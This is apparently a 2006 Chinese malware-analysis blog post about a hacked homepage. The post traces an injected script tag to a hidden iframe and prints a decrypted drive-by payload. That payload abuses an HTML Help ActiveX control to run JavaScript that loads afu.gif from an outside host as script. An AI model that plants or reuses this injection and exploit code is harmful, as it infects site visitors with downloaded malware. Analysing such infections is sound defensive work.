endurer原创
2006-03-16第2版补充:Kaspersky对afu.gif的反应。
2006-03-14第1版
首页被插入代码:
<script language="javascript" src="http://www.***3core.com/images/gif.js">
http://www.***3core.com/images/gif.js的代码为:
document.write("<iframe src=http://www.***3core.com/images/error.htm width=0 height=0></iframe>");
http://www.***3core.com/images/error.htm(Kaspersky报为Trojan-Downloader.JS.Agent.e)的内容为加密的脚本,解密后为:
<!--
var Words ="<script>document.write(unescape('<HTML>
<head>
</head>
<BODY>
<div style="display:none">
<OBJECT id="f1"
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;file://c:\WINDOWS\Help\apps.chm'>
</OBJECT>
<OBJECT id="f2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;javascript:eval("document.write(\"<SCRIPT language%20%3D%20JScript src=\\\"http://www.***3core.com/images/afu.gif\""+String.fromCharCode(62)+"</SCR\"+\"IPT\"+String.fromCharCode(62))")'>
</OBJECT>
</div>
<script>
f1.Click();setTimeout("f2.Click();",0);
</script>
</BODY>
</HTML>'));</script>"
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
OutWord();
// -->
这个error.htm的内容与
中的afu.htm相似,同样是下载一个名为afu.gif的文件。
Kaspersky将afu.gif报为Exploit.VBS.Phel.bq